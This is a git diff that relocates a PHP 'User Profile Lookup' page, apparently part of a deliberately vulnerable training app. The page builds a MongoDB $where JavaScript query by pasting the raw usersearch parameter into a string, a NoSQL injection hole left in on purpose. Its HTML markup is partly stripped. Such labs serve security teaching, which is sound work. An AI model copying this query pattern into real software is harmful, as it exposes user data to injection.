+++ b/vuln_apps/src/userdata.php
@@ -0,0 +1,48 @@
+
+
+
+ User Profile Lookup
+
+
+ appUserData;
+ $collection = $db->users;
+ $usersearch = $_GET['usersearch'];
+ $js = "function () { var query = '". $usersearch . "'; return this.username == query;}";
+ print $js;
+ print '
';
+
+ $cursor = $collection->find(array('$where' => $js));
+ echo $cursor->count() . ' user found.
';
+
+ foreach ($cursor as $obj) {
+ echo 'Name: ' . $obj['name'] . '
';
+ echo 'Username: ' . $obj['username'] . '
';
+ echo 'Email: ' . $obj['email'] . '
';
+ echo '
';
+ }
+
+ $conn->close();
+ } catch (MongoConnectionException $e) {
+ die('Error connecting to MongoDB server : ' . $e->getMessage());
+ } catch (MongoException $e) {
+ die('Error: ' . $e->getMessage());
+ }
+ }
+ ?>
+
+
+ Enter your username:
+
+
+
+
+
+
diff --git a/vuln_apps/userdata.php b/vuln_apps/userdata.php
deleted file mode 100644
index 0fc8165..0000000
--- a/vuln_apps/userdata.php
+++ /dev/null
@@ -1,50 +0,0 @@
-
-
-
-
-
-User Profile Lookup
-
-
-
-appUserData;
- $collection = $db->users;
- $search = $_GET['usersearch'];
- $js = "function () { var query = '". $usersearch . "'; return this.username == query;}";
- print $js;
- print '
';
-
- $cursor = $collection->find(array('$where' => $js));
- echo $cursor->count() . ' user found.
';
-
- foreach ($cursor as $obj) {
- echo 'Name: ' . $obj['name'] . '
';
- echo 'Username: ' . $obj['username'] . '
';
- echo 'Email: ' . $obj['email'] . '
';
- echo '
';
- }
-
-$conn->close();
-} catch (MongoConnectionException $e) {
- die('Error connecting to MongoDB server : ' . $e->getMessage());
-} catch (MongoException $e) {
- die('Error: ' . $e->getMessage());
-}
-}
-?>
-
-
-Enter your username:
-
-
-
-
-
-